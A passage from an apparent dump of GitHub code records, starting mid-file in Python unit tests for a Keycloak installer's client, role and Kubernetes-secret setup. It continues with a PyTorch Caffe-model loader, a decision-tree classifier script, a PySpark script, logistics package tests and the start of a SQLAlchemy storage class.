json.loads(responses.calls[0].request.body))\n self.assertEqual(kc_clients_url, responses.calls[0].request.url)\n self.assertEqual(kc_clients_uuid_url, responses.calls[1].request.url)\n\n # Test role creation\n client.create_role('user')\n client.create_role('admin')\n client.create_role('monitor-ro')\n\n # verify overall call count\n self.assertEqual(5, len(responses.calls))\n\n # Verify calls to create roles\n exp_req_body = {'name': 'user'}\n self.assertEqual(exp_req_body, json.loads(responses.calls[2].request.body))\n exp_req_body = {'name': 'admin'}\n self.assertEqual(exp_req_body, json.loads(responses.calls[3].request.body))\n exp_req_body = {'name': 'monitor-ro'}\n self.assertEqual(exp_req_body, json.loads(responses.calls[4].request.body))\n\n @responses.activate\n def test_create_role_already_exists(self):\n \"\"\"Test client create with role assignment, where role exists\"\"\"\n\n kc_base = 'http://keycloak.services:8080/keycloak'\n\n # initial client create call\n kc_clients_url = '{}/admin/realms/shasta/clients'.format(kc_base)\n\n kcs = keycloak_setup.KeycloakSetup()\n kcs._kc_master_admin_client_cache = requests.Session()\n\n client = keycloak_setup.KeycloakClient(kcs,\n kcs.SHASTA_REALM_NAME,\n 'test_client')\n\n responses.add(\n responses.POST, kc_clients_url, status=201, json={},\n headers={'location': '{}/admin/realms/shasta/clients/{}'.format(kc_base, client.id)})\n\n # call to get keycloak id\n kc_clients_uuid_url = kc_clients_url + \"?clientId=\" + client.id\n responses.add(\n responses.GET, kc_clients_uuid_url, status=200, json=[{'id': \"12345\"}],\n headers={'location': str(mock.sentinel.location)})\n\n # call to create role(s)\n kc_roles_url = '{}/admin/realms/shasta/clients/{}/roles'.format(kc_base, \"12345\")\n responses.add(responses.POST, kc_roles_url, status=409, json={})\n\n client.create()\n self.assertEqual(kc_clients_url, responses.calls[0].request.url)\n self.assertEqual(kc_clients_uuid_url, responses.calls[1].request.url)\n\n client.create_role(\"user\")\n self.assertEqual(3, len(responses.calls))\n self.assertEqual(kc_roles_url, responses.calls[2].request.url)\n\n @responses.activate\n def test_create_role_fails(self):\n \"\"\"Test client create with role assignment, where the role assignment fails\"\"\"\n\n kc_base = 'http://keycloak.services:8080/keycloak'\n\n # initial client create call\n kc_clients_url = '{}/admin/realms/shasta/clients'.format(kc_base)\n\n kcs = keycloak_setup.KeycloakSetup()\n kcs._kc_master_admin_client_cache = requests.Session()\n\n client = keycloak_setup.KeycloakClient(kcs,\n kcs.SHASTA_REALM_NAME,\n 'test_client')\n\n responses.add(\n responses.POST, kc_clients_url, status=201, json={},\n headers={'location': '{}/admin/realms/shasta/clients/{}'.format(kc_base, client.id)})\n\n # call to get keycloak id\n kc_clients_uuid_url = kc_clients_url + \"?clientId=\" + client.id\n responses.add(\n responses.GET, kc_clients_uuid_url, status=200, json=[{'id': \"12345\"}],\n headers={'location': str(mock.sentinel.location)})\n\n # call to create roles\n kc_roles_url = '{}/admin/realms/shasta/clients/{}/roles'.format(kc_base, \"12345\")\n\n responses.add(responses.POST, kc_roles_url, status=404, json={})\n\n client.create()\n\n self.assertRaises(\n Exception, client.create_role, \"user\")\n\n @responses.activate\n def test_create_client_exists(self):\n\n kcs = keycloak_setup.KeycloakSetup()\n kcs._kc_master_admin_client_cache = requests.Session()\n\n kc_base = 'http://keycloak.services:8080/keycloak'\n kc_clients_url = '{}/admin/realms/{}/clients'.format(kc_base, kcs.SHASTA_REALM_NAME)\n responses.add(\n responses.POST, kc_clients_url, status=409, json={})\n\n client = keycloak_setup.KeycloakClient(kcs,\n kcs.SHASTA_REALM_NAME,\n 'test')\n\n # call to get keycloak id\n kc_clients_uuid_url = kc_clients_url + \"?clientId=\" + client.id\n responses.add(\n responses.GET, kc_clients_uuid_url, status=200, json=[{'id': \"12345\"}],\n headers={'location': str(mock.sentinel.location)})\n\n client.create()\n\n self.assertEqual(2, len(responses.calls))\n self.assertEqual(kc_clients_url, responses.calls[0].request.url)\n self.assertEqual(kc_clients_uuid_url, responses.calls[1].request.url)\n\n @responses.activate\n def test_create_client_fails(self):\n kc_base = 'http://keycloak.services:8080/keycloak'\n kc_clients_url = '{}/admin/realms/shasta/clients'.format(kc_base)\n responses.add(\n responses.POST, kc_clients_url, status=401, json={})\n\n kcs = keycloak_setup.KeycloakSetup()\n kcs._kc_master_admin_client_cache = requests.Session()\n\n client = keycloak_setup.KeycloakClient(kcs,\n 'test',\n 'test')\n\n self.assertRaises(Exception, client.create)\n\n def test_create_keycloak_client_from_spec_minimal(self):\n client_id = str(mock.sentinel.client_id)\n min_spec = {} # All of the keys are optional.\n kcs = keycloak_setup.KeycloakSetup()\n customer_access_url = str(mock.sentinel.customer_access_url)\n res = keycloak_setup.create_keycloak_client_from_spec(\n client_id, min_spec, kcs, customer_access_url)\n self.assertEqual(kcs, res.kas)\n self.assertEqual(kcs.SHASTA_REALM_NAME, res.realm)\n self.assertEqual(client_id, res.id)\n self.assertIsNone(res.k8s_secret_name)\n self.assertIsNone(res.k8s_secret_namespaces)\n self.assertEqual({}, res._k8s_secret_ext_attr)\n self.assertIs(res.standard_flow_enabled, False)\n self.assertIs(res.implicit_flow_enabled, False)\n self.assertIs(res.direct_access_grants_enabled, False)\n self.assertIs(res.service_accounts_enabled, False)\n self.assertIs(res.authorization_services_enabled, False)\n self.assertIs(res.public_client, False)\n self.assertEqual({}, res._kc_ext_attr)\n\n def test_create_keycloak_client_from_spec_all(self):\n client_id = str(mock.sentinel.client_id)\n spec = { # Sets all the possible keys\n 'type': 'public',\n 'standardFlowEnabled': True,\n 'implicitFlowEnabled': True,\n 'directAccessGrantsEnabled': True,\n 'serviceAccountsEnabled': True,\n 'authorizationServicesEnabled': True,\n 'proxiedHosts': [\n 'test1',\n 'test2',\n ],\n 'secret': {\n 'name': 'secret1',\n 'namespaces': ['namespace1', 'namespace2'],\n }\n }\n kcs = keycloak_setup.KeycloakSetup()\n customer_access_url = str(mock.sentinel.customer_access_url)\n res = keycloak_setup.create_keycloak_client_from_spec(\n client_id, spec, kcs, customer_access_url)\n self.assertEqual(kcs, res.kas)\n self.assertEqual(kcs.SHASTA_REALM_NAME, res.realm)\n self.assertEqual(client_id, res.id)\n self.assertEqual('secret1', res.k8s_secret_name)\n self.assertEqual(['namespace1', 'namespace2'], res.k8s_secret_namespaces)\n\n exp_secret_ext_attr = {\n 'discovery-url': f'{customer_access_url}/realms/shasta'\n }\n\n self.assertEqual(exp_secret_ext_attr, res._k8s_secret_ext_attr)\n self.assertIs(res.standard_flow_enabled, True)\n self.assertIs(res.implicit_flow_enabled, True)\n self.assertIs(res.direct_access_grants_enabled, True)\n self.assertIs(res.service_accounts_enabled, True)\n self.assertIs(res.authorization_services_enabled, True)\n self.assertIs(res.public_client, True)\n\n exp_ext_attr = {\n 'redirectUris': [\n 'https://test1/oauth/callback',\n 'https://test2/oauth/callback',\n ]\n }\n self.assertEqual(exp_ext_attr, res._kc_ext_attr)\n\n def test_k8s_get_secret(self):\n # Mocks out kubernetes CoreV1Api object and read_namespaced_secret()\n # method.\n v1 = mock.Mock()\n v1.read_namespaced_secret.return_value = mock.sentinel.v1_secret\n\n # Sentinel inputs for verification\n ns = str(mock.sentinel.ns)\n name = str(mock.sentinel.name)\n\n secret = keycloak_setup.k8s_get_secret(ns, name, v1=v1)\n\n # Verify expected secret returned\n self.assertIs(secret, mock.sentinel.v1_secret)\n\n # Verify that read_namespaced_secret called with expected inputs\n v1.read_namespaced_secret.assert_called_once_with(name, ns)\n\n def test_k8s_get_secret_not_found(self):\n # Mocks out kubernetes CoreV1Api object and read_namespaced_secret()\n # method.\n v1 = mock.Mock()\n v1.read_namespaced_secret.side_effect = rest.ApiException(404)\n\n # Sentinel inputs for verification\n ns = str(mock.sentinel.ns)\n name = str(mock.sentinel.name)\n\n secret = keycloak_setup.k8s_get_secret(ns, name, v1=v1)\n\n # Verify return secret is None\n self.assertIsNone(secret)\n\n # Verify that read_namespaced_secret called with expected inputs\n v1.read_namespaced_secret.assert_called_once_with(name, ns)\n\n def test_k8s_get_secret_fails(self):\n # Mocks out kubernetes CoreV1Api object and read_namespaced_secret()\n # method.\n v1 = mock.Mock()\n v1.read_namespaced_secret.side_effect = rest.ApiException(401)\n\n # Sentinel inputs for verification\n ns = str(mock.sentinel.ns)\n name = str(mock.sentinel.name)\n\n # Verify exception is raised\n self.assertRaises(\n rest.ApiException,\n keycloak_setup.k8s_get_secret, ns, name, v1=v1,\n )\n\n # Verify that read_namespaced_secret called with expected inputs\n v1.read_namespaced_secret.assert_called_once_with(name, ns)\n\n def test_k8s_apply_secret(self):\n # Mock CoreV1Api() object\n v1 = mock.Mock()\n # Force k8s_get_secret to return None to create a new secret\n v1.read_namespaced_secret.return_value = None\n v1.create_namespaced_secret.return_value = None\n\n ns = str(mock.sentinel.ns)\n name = str(mock.sentinel.secret_name)\n data = {'key': 'value'}\n\n secret = keycloak_setup.k8s_apply_secret(ns, name, data, v1=v1)\n\n # Verify create_namespaced_secret() called\n v1.create_namespaced_secret.assert_called_once_with(ns, secret)\n\n # Verify created secret\n self.assertEqual(secret.metadata.name, name)\n self.assertEqual(secret.metadata.namespace, ns)\n self.assertEqual(secret.data['key'], base64.b64encode(bytes('value', 'utf-8')).decode(\"ascii\"))\n\n def test_k8s_apply_secret_conflict(self):\n # Mock CoreV1Api() object\n v1 = mock.Mock()\n # Force k8s_get_secret to return None to create a new secret\n v1.read_namespaced_secret.return_value = None\n # Cause create_namespaced_secret() to raise 409\n v1.create_namespaced_secret.side_effect = rest.ApiException(409)\n\n ns = str(mock.sentinel.ns)\n name = str(mock.sentinel.secret_name)\n data = {'key': 'value'}\n\n keycloak_setup.k8s_apply_secret(ns, name, data, v1=v1)\n # No exception raised is expected for 409, but still verify\n # create_namespaced_secret() called\n v1.create_namespaced_secret.assert_called_once_with(ns, mock.ANY)\n\n def test_k8s_apply_secret_raises(self):\n # Mock CoreV1Api() object\n v1 = mock.Mock()\n # Force k8s_get_secret to return None to create a new secret\n v1.read_namespaced_secret.return_value = None\n # Cause create_namespaced_secret() to raise non-409\n v1.create_namespaced_secret.side_effect = rest.ApiException(401)\n\n ns = str(mock.sentinel.ns)\n name = str(mock.sentinel.secret_name)\n data = {'key': 'value'}\n\n self.assertRaises(\n rest.ApiException,\n keycloak_setup.k8s_apply_secret, ns, name, data, v1=v1,\n )\n\n # Verify create_namespaced_secret() called\n v1.create_namespaced_secret.assert_called_once_with(ns, mock.ANY)\n\n def test_k8s_apply_secret_no_change(self):\n existing_secret = mock.MagicMock()\n existing_secret.data = {'key': base64.b64encode(bytes('value', 'utf-8')).decode(\"ascii\")}\n\n # Mock CoreV1Api() object\n v1 = mock.Mock()\n # Force k8s_get_secret to return a mocked secret\n v1.read_namespaced_secret.return_value = existing_secret\n # Ensure that patched_namespaced_secret() isn't called\n v1.patch_namespaced_secret.side_effect = RuntimeError('called')\n\n ns = str(mock.sentinel.ns)\n name = str(mock.sentinel.secret_name)\n data = {'key': 'value'}\n\n self.assertIs(\n existing_secret,\n keycloak_setup.k8s_apply_secret(ns, name, data, v1=v1)\n )\n\n def test_k8s_apply_secret_update(self):\n existing_secret = mock.MagicMock()\n existing_secret.data = {'key': base64.b64encode(bytes('old-value', 'utf-8')).decode(\"ascii\")}\n\n # Mock CoreV1Api() object\n v1 = mock.Mock()\n # Force k8s_get_secret to return a mocked secret\n v1.read_namespaced_secret.return_value = existing_secret\n v1.patch_namespaced_secret.return_value = None\n\n ns = str(mock.sentinel.ns)\n name = str(mock.sentinel.secret_name)\n data = {'key': 'new-value'}\n\n secret = keycloak_setup.k8s_apply_secret(ns, name, data, v1=v1)\n\n # Verify patched_namespaced_secret() called\n v1.patch_namespaced_secret.assert_called_once_with(name, ns, secret)\n\n # Verify patched secret has new value\n self.assertEqual(secret.data['key'], base64.b64encode(bytes('new-value', 'utf-8')).decode(\"ascii\"))\n\n def test_read_keycloak_master_admin_secrets_no_files_default(self):\n tmp_dir = self.useFixture(fixtures.TempDir()).path\n ret = keycloak_setup.read_keycloak_master_admin_secrets(\n secret_dir=tmp_dir)\n exp = {\n 'password': 'adminpwd', 'user': 'admin', 'client_id': 'admin-cli'}\n self.assertEqual(exp, ret)\n\n def test_read_keycloak_master_admin_secrets_files(self):\n tmp_dir = self.useFixture(fixtures.TempDir()).path\n with open('{}/client-id'.format(tmp_dir), 'w') as f:\n f.write(str(mock.sentinel.client_id))\n with open('{}/user'.format(tmp_dir), 'w') as f:\n f.write(str(mock.sentinel.user))\n with open('{}/password'.format(tmp_dir), 'w') as f:\n f.write(str(mock.sentinel.password))\n\n ret = keycloak_setup.read_keycloak_master_admin_secrets(\n secret_dir=tmp_dir)\n exp = {\n 'password': str(mock.sentinel.password),\n 'user': str(mock.sentinel.user),\n 'client_id': str(mock.sentinel.client_id),\n }\n self.assertEqual(exp, ret)\n\n def test_main(self):\n self.useFixture(fixtures.EnvironmentVariable(\n 'KEYCLOAK_OAUTH2_PROXY_CLIENT_PROXIED_HOSTS', '[]'))\n\n self.useFixture(fixtures.MockPatchObject(\n keycloak_setup.kubernetes.config, 'load_incluster_config'))\n rkmas_ret = {\n 'client_id': str(mock.sentinel.client_id),\n 'user': str(mock.sentinel.user),\n 'password': str(mock.sentinel.password),\n }\n rkmas_mock = self.useFixture(\n fixtures.MockPatchObject(\n keycloak_setup, 'read_keycloak_master_admin_secrets',\n return_value=rkmas_ret)).mock\n kcs_mock = self.useFixture(\n fixtures.MockPatchObject(keycloak_setup, 'KeycloakSetup',\n autospec=True)).mock\n\n client_mock = self.useFixture(\n fixtures.MockPatchObject(keycloak_setup, 'KeycloakClient',\n autospec=True)).mock\n\n keycloak_setup.main()\n\n rkmas_mock.assert_called_once_with()\n\n exp_clients_to_cleanup = ['gatekeeper']\n exp_secrets_to_cleanup = [{'name': 'keycloak-gatekeeper-client', 'namespaces': ['services']}]\n kcs_mock.assert_called_once_with(\n keycloak_base=None,\n cluster_keycloak_base=None,\n kc_master_admin_client_id=str(mock.sentinel.client_id),\n kc_master_admin_password=str(mock.sentinel.password),\n kc_master_admin_username=str(mock.sentinel.user),\n customer_access_url=None,\n clients_to_cleanup=exp_clients_to_cleanup,\n secrets_to_cleanup=exp_secrets_to_cleanup,\n )\n\n kcs_mock.return_value.run.assert_called_once_with()\n client_mock.assert_called()\n\n def test_get_wlm_client(self):\n cluster_keycloak_base = 'https://api-gw-service-nmn.local/keycloak'\n kcs = keycloak_setup.KeycloakSetup()\n wlm_client = keycloak_setup.get_wlm_client(kcs, cluster_keycloak_base)\n\n self.assertEqual(wlm_client.id, 'wlm-client')\n self.assertEqual(wlm_client.realm, 'shasta')\n self.assertEqual(wlm_client.k8s_secret_name, 'wlm-client-auth')\n self.assertEqual(wlm_client.k8s_secret_namespaces, ['default'])\n self.assertFalse(wlm_client.public_client)\n self.assertFalse(wlm_client.standard_flow_enabled)\n self.assertFalse(wlm_client.implicit_flow_enabled)\n self.assertFalse(wlm_client.direct_access_grants_enabled)\n self.assertTrue(wlm_client.service_accounts_enabled)\n","repo_name":"Cray-HPE/keycloak-installer","sub_path":"tests/test_keycloak_setup.py","file_name":"test_keycloak_setup.py","file_ext":"py","file_size_in_byte":52802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44892066094","text":"import torch\nimport torch.nn as nn\n\n\nclass VGG(nn.Module):\n def __init__(self, features, num_classes=1000):\n super(VGG, self).__init__()\n self.features = features\n self.classifier = nn.Sequential(\n nn.Linear(512 * 7 * 7, 4096),\n nn.ReLU(True),\n nn.Dropout(),\n nn.Linear(4096, 4096),\n nn.ReLU(True),\n nn.Dropout(),\n nn.Linear(4096, num_classes),\n )\n\n\nclass NIN(nn.Module):\n def __init__(self, pooling):\n super(NIN, self).__init__()\n if pooling == 'max':\n pool2d = nn.MaxPool2d((3, 3),(2, 2),(0, 0),ceil_mode=True)\n elif pooling == 'avg':\n pool2d = nn.AvgPool2d((3, 3),(2, 2),(0, 0),ceil_mode=True)\n\n self.features = nn.Sequential(\n nn.Conv2d(3,96,(11, 11),(4, 4)),\n nn.ReLU(inplace=True),\n nn.Conv2d(96,96,(1, 1)),\n nn.ReLU(inplace=True),\n nn.Conv2d(96,96,(1, 1)),\n nn.ReLU(inplace=True),\n pool2d,\n nn.Conv2d(96,256,(5, 5),(1, 1),(2, 2)),\n nn.ReLU(inplace=True),\n nn.Conv2d(256,256,(1, 1)),\n nn.ReLU(inplace=True),\n nn.Conv2d(256,256,(1, 1)),\n nn.ReLU(inplace=True),\n pool2d,\n nn.Conv2d(256,384,(3, 3),(1, 1),(1, 1)),\n nn.ReLU(inplace=True),\n nn.Conv2d(384,384,(1, 1)),\n nn.ReLU(inplace=True),\n nn.Conv2d(384,384,(1, 1)),\n nn.ReLU(inplace=True),\n pool2d,\n nn.Dropout(0.5),\n nn.Conv2d(384,1024,(3, 3),(1, 1),(1, 1)),\n nn.ReLU(inplace=True),\n nn.Conv2d(1024,1024,(1, 1)),\n nn.ReLU(inplace=True),\n nn.Conv2d(1024,1000,(1, 1)),\n nn.ReLU(inplace=True),\n nn.AvgPool2d((6, 6),(1, 1),(0, 0),ceil_mode=True),\n nn.Softmax(),\n )\n\n\n\ndef buildSequential(channel_list, pooling):\n layers = []\n in_channels = 3\n if pooling == 'max':\n pool2d = nn.MaxPool2d(kernel_size=2, stride=2)\n elif pooling == 'avg':\n pool2d = nn.AvgPool2d(kernel_size=2, stride=2)\n else: \n raise ValueError(\"Unrecognized pooling parameter\")\n for c in channel_list:\n if c == 'P':\n layers += [pool2d]\n else:\n conv2d = nn.Conv2d(in_channels, c, kernel_size=3, padding=1)\n layers += [conv2d, nn.ReLU(inplace=True)]\n in_channels = c\n return nn.Sequential(*layers)\n\n\nchannel_list = {\n'VGG-16': [64, 64, 'P', 128, 128, 'P', 256, 256, 256, 'P', 512, 512, 512, 'P', 512, 512, 512, 'P'],\n'VGG-19': [64, 64, 'P', 128, 128, 'P', 256, 256, 256, 256, 'P', 512, 512, 512, 512, 'P', 512, 512, 512, 512, 'P'],\n}\n\nnin_dict = {\n'C': ['conv1', 'cccp1', 'cccp2', 'conv2', 'cccp3', 'cccp4', 'conv3', 'cccp5', 'cccp6', 'conv4-1024', 'cccp7-1024', 'cccp8-1024'], \n'R': ['relu0', 'relu1', 'relu2', 'relu3', 'relu5', 'relu6', 'relu7', 'relu8', 'relu9', 'relu10', 'relu11', 'relu12'],\n'P': ['pool1', 'pool2', 'pool3', 'pool4'],\n'D': ['drop'],\n}\nvgg16_dict = {\n'C': ['conv1_1', 'conv1_2', 'conv2_1', 'conv2_2', 'conv3_1', 'conv3_2', 'conv3_3', 'conv4_1', 'conv4_2', 'conv4_3', 'conv5_1', 'conv5_2', 'conv5_3'],\n'R': ['relu1_1', 'relu1_2', 'relu2_1', 'relu2_2', 'relu3_1', 'relu3_2', 'relu3_3', 'relu4_1', 'relu4_2', 'relu4_3', 'relu5_1', 'relu5_2', 'relu5_3'],\n'P': ['pool1', 'pool2', 'pool3', 'pool4', 'pool5'],\n}\nvgg19_dict = {\n'C': ['conv1_1', 'conv1_2', 'conv2_1', 'conv2_2', 'conv3_1', 'conv3_2', 'conv3_3', 'conv3_4', 'conv4_1', 'conv4_2', 'conv4_3', 'conv4_4', 'conv5_1', 'conv5_2', 'conv5_3', 'conv5_4'],\n'R': ['relu1_1', 'relu1_2', 'relu2_1', 'relu2_2', 'relu3_1', 'relu3_2', 'relu3_3', 'relu3_4', 'relu4_1', 'relu4_2', 'relu4_3', 'relu4_4', 'relu5_1', 'relu5_2', 'relu5_3', 'relu5_4'],\n'P': ['pool1', 'pool2', 'pool3', 'pool4', 'pool5'],\n}\n\n\ndef modelSelector(model_file, pooling):\n if \"vgg\" in model_file:\n if \"19\" in model_file:\n print(\"VGG-19 Architecture Detected\")\n cnn, layerList = VGG(buildSequential(channel_list['VGG-19'], pooling)), vgg19_dict\n elif \"16\" in model_file:\n print(\"VGG-16 Architecture Detected\")\n cnn, layerList = VGG(buildSequential(channel_list['VGG-16'], pooling)), vgg16_dict\n else:\n raise ValueError(\"VGG architecture not recognized.\") \n elif \"nin\" in model_file:\n print(\"NIN Architecture Detected\")\n cnn, layerList = NIN(pooling), nin_dict\n else:\n raise ValueError(\"Model architecture not recognized.\")\n return cnn, layerList\n\n# Print like Torch7/loadcaffe\ndef print_loadcaffe(cnn, layerList): \n c = 0\n for l in list(cnn):\n if \"Conv2d\" in str(l):\n in_c, out_c, ks = str(l.in_channels), str(l.out_channels), str(l.kernel_size)\n print(layerList['C'][c] +\": \" + (out_c + \" \" + in_c + \" \" + ks).replace(\")\",'').replace(\"(\",'').replace(\",\",'') )\n c+=1\n if c == len(layerList['C']):\n break\n\n# Load the model, and configure pooling layer type\ndef loadCaffemodel(model_file, pooling, use_gpu):\n cnn, layerList = modelSelector(str(model_file).lower(), pooling)\n cnn.load_state_dict(torch.load(model_file))\n print(\"Successfully loaded \" + str(model_file))\n\n # Maybe convert the model to cuda now, to avoid later issues\n if use_gpu > -1:\n cnn = cnn.cuda()\n cnn = cnn.features \n\n print_loadcaffe(cnn, layerList)\n\n return cnn, layerList","repo_name":"snehavenkataramana/ColorizationAndStyleTransferToBWVideos","sub_path":"CaffeLoader.py","file_name":"CaffeLoader.py","file_ext":"py","file_size_in_byte":5502,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"15824109164","text":"import time\r\nimport pandas as pd\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.tree import export_graphviz\r\nfrom six import StringIO\r\nimport pydotplus\r\nimport os\r\n\r\n# Import the data\r\n# -----You should check the path before running the code-----\r\ncol_names = ['gameId', 'creationTime', 'gameDuration', 'seasonId', 'winner',\r\n 'firstBlood', 'firstTower', 'firstInhibitor', 'firstBaron', 'firstDragon', 'firstRiftHerald',\r\n 't1_towerKills', 't1_inhibitorKills', 't1_baronKills', 't1_dragonKills', 't1_riftHeraldKills',\r\n 't2_towerKills', 't2_inhibitorKills', 't2_baronKills', 't2_dragonKills', 't2_riftHeraldKills']\r\ndata = pd.read_csv(\"F:/各个学科/工业大数据/lab/project1/data/new_data.csv\", header=None, names=col_names)\r\ntest = pd.read_csv(\"F:/各个学科/工业大数据/lab/project1/data/test_set.csv\", header=None, names=col_names)\r\ndata = data.iloc[1:]\r\ntest = test.iloc[1:]\r\nfeature_cols = ['firstBlood', 'firstTower', 'firstInhibitor', 'firstBaron', 'firstDragon',\r\n 't1_towerKills', 't1_inhibitorKills', 't1_baronKills', 't1_dragonKills', 't1_riftHeraldKills',\r\n 't2_towerKills', 't2_inhibitorKills', 't2_baronKills', 't2_dragonKills', 't2_riftHeraldKills']\r\nX_train = data[feature_cols]\r\ny_train = data.winner\r\nX_test = test[feature_cols]\r\ny_test = test.winner\r\n\r\n# Create a tree\r\nDT_clf = DecisionTreeClassifier(criterion='entropy', max_depth=7, min_samples_split=15)\r\n\r\n# Calculate the Training time\r\ntime_start = time.time()\r\nDT_clf = DT_clf.fit(X_train, y_train)\r\ntime_end = time.time()\r\nprint('Training time: ', time_end - time_start)\r\n\r\n# Apply the tree\r\ny_pred = DT_clf.predict(X_test)\r\nprint(\"Accuracy:\", accuracy_score(y_test, y_pred))\r\n\r\n# Visualize the decision tree\r\nos.environ[\"PATH\"] += os.pathsep + 'C:/Program Files (x86)/Graphviz2.38/bin/'\r\ndot_data = StringIO()\r\nexport_graphviz(DT_clf, out_file=dot_data, filled=True, rounded=True, special_characters=True, feature_names=feature_cols,\r\n class_names=['0', '1'])\r\ngraph = pydotplus.graph_from_dot_data(dot_data.getvalue())\r\ngraph.write_png('tree.png')\r\n\r\n\r\n\r\n","repo_name":"1511pspsps/BigData_Project1","sub_path":"DT.py","file_name":"DT.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"41546496962","text":"from pyspark import SparkContext\nfrom pyspark import SparkConf\n\n\nconf = SparkConf().setMaster(\"local[*]\")\ncontext = SparkContext.getOrCreate(conf)\nartists = context.textFile(\"../datasets/artists.csv\")\nartistMapping = artists.map(lambda x: x.split(\",\"))\n\noldestArtist = artistMapping.map(lambda artist: artist[4]).min()\n\nprint(\"Year of birth of oldest artist:\" + str(oldestArtist))\n\n","repo_name":"ErikSteLarsen/TDT4305_Project","sub_path":"task_2.py","file_name":"task_2.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69986596945","text":"import os\n\nimport pytest\nimport pandas as pd\n\nfrom dtocean_logistics.feasibility.electrical import dynamic_feas\n\nthis_dir = os.path.dirname(os.path.realpath(__file__))\ndata_dir = os.path.join(this_dir, \"..\", \"test_data\")\n\n\n@pytest.fixture(scope=\"module\")\ndef dynamic_cable():\n \n path = os.path.join(data_dir, \"dynamic_cable.xlsx\")\n df = pd.read_excel(path, index_col=0)\n \n return df\n\n\n@pytest.fixture(scope=\"module\")\ndef connectors():\n \n path = os.path.join(data_dir, \"connectors.xlsx\")\n df = pd.read_excel(path, index_col=0)\n \n return df\n\n\ndef test_dynamic_feas(site, dynamic_cable, connectors):\n\n (feas_e,\n feas_v,\n feas_m_pv,\n feas_m_pe,\n feas_m_ve,\n deck_req) = dynamic_feas(None, None, site, dynamic_cable, connectors)\n \n assert \"rov\" in feas_e\n assert set(feas_v.keys()) == set(['CLB', 'CLV'])\n assert set(feas_m_pv.keys()) == set(['CLB', 'CLV'])\n assert not feas_m_pe\n assert \"rov\" in feas_m_ve\n assert all([v >= 0 for k, v in deck_req.items()])\n","repo_name":"DTOcean/dtocean-logistics","sub_path":"tests/test_feasibility_electrical.py","file_name":"test_feasibility_electrical.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"34426672271","text":"# -*- coding: utf-8 -*-\n#SQLAlchemyORM.py\n#-------------------------------\n# Created By : Matthew Kastl\n# Created Date: 3/26/2023\n# version 9.0\n#-------------------------------\n\"\"\" This file is an implementation of the SQLAlchemy ORM geared towards Semaphore and its schema. \n \"\"\" \n#-------------------------------\n# \n#\n#Imports\nimport sys\nimport os\n\nSCRIPT_DIR = os.path.dirname(os.path.abspath(__file__)) \nsys.path.append(os.path.dirname(SCRIPT_DIR))\n\nfrom sqlalchemy import create_engine as sqlalchemy_create_engine\nfrom sqlalchemy import Table, Column, Integer, String, DateTime, Float, MetaData, UniqueConstraint, Engine, ForeignKey, insert, CursorResult, Select, select, distinct, Boolean, Interval\nfrom os import getenv\nfrom datetime import timedelta, datetime\n\nfrom src.SeriesStorage.ISeriesStorage import ISeriesStorage\n\nfrom DataClasses import Series, SeriesDescription, SemaphoreSeriesDescription, Input, Output, TimeDescription\nfrom utility import log\n\nclass SQLAlchemyORM(ISeriesStorage):\n \n def __init__(self) -> None:\n \"\"\"Constructor generates an a db schema. Automatically creates the \n metadata object holding the defined schema.\n \"\"\"\n self.__create_schema()\n self.__create_engine(getenv('DB_LOCATION_STRING'), False)\n\n #############################################################################################\n ################################################################################## Public methods\n #############################################################################################\n\n def select_input(self, seriesDescription: SeriesDescription, timeDescription : TimeDescription) -> Series:\n \"\"\"Selects a given series given a SeriesDescription and TimeDescription\n :param seriesDescription: SeriesDescription - A series description object\n :param timeDescription: TimeDescription - A hydrated time description object\n \"\"\"\n\n # Datum is stored in the db as the string 'None' if there is no datum, we need to convert it here before the query\n datumSearchTerm = 'None' if seriesDescription.dataDatum == None else seriesDescription.dataDatum\n\n statement = (select(self.inputs)\n .where(self.inputs.c.dataSource == seriesDescription.dataSource)\n .where(self.inputs.c.dataLocation == seriesDescription.dataLocation)\n .where(self.inputs.c.dataSeries == seriesDescription.dataSeries)\n .where(self.inputs.c.dataDatum == datumSearchTerm)\n .where(self.inputs.c.verifiedTime >= timeDescription.fromDateTime)\n .where(self.inputs.c.verifiedTime <= timeDescription.toDateTime)\n )\n tupleishResult = self.__dbSelection(statement).fetchall()\n inputResult = self.__splice_input(tupleishResult)\n\n # If an interval was provided, we will mod each verified time against it\n # any that fail we remove\n if timeDescription.interval != None:\n for input in inputResult:\n if not (input.timeVerified.timestamp() % timeDescription.interval.total_seconds() == 0):\n inputResult.remove(input)\n\n series = Series(seriesDescription, True, timeDescription)\n series.data = inputResult\n return series\n \n def select_output(self, semaphoreSeriesDescription: SemaphoreSeriesDescription, timeDescription : TimeDescription) -> Series:\n \"\"\"Selects an output series given a SemaphoreSeriesDescription and TimeDescription\n :param semaphoreSeriesDescription: SemaphoreSeriesDescription - A semaphore series description object\n :param timeDescription: TimeDescription - A hydrated time description object\n \"\"\"\n\n series = Series(semaphoreSeriesDescription, True, timeDescription)\n \n\n #Get the lead time for time calculations\n statement = (select(distinct(self.outputs.c.leadTime))\n .where(self.outputs.c.dataLocation == semaphoreSeriesDescription.dataLocation)\n .where(self.outputs.c.dataSeries == semaphoreSeriesDescription.dataSeries)\n .where(self.outputs.c.dataDatum == semaphoreSeriesDescription.dataDatum)\n )\n leadTimes = self.__dbSelection(statement).fetchall()\n if len(self.__dbSelection(statement).fetchall()) == 0: #If no lead time is found for some reason return nothing and log this\n log(f'SQLAlchemyORM | select_output | No leadtime found for SemaphoreSeriesDescription:{semaphoreSeriesDescription}')\n return series\n \n leadTime = leadTimes[0]\n fromGeneratedTime = timeDescription.fromDateTime - leadTime[0]\n toGeneratedTime = timeDescription.toDateTime - leadTime[0]\n \n statement = (select(self.outputs)\n .where(self.outputs.c.dataLocation == semaphoreSeriesDescription.dataLocation)\n .where(self.outputs.c.dataSeries == semaphoreSeriesDescription.dataSeries)\n .where(self.outputs.c.dataDatum == 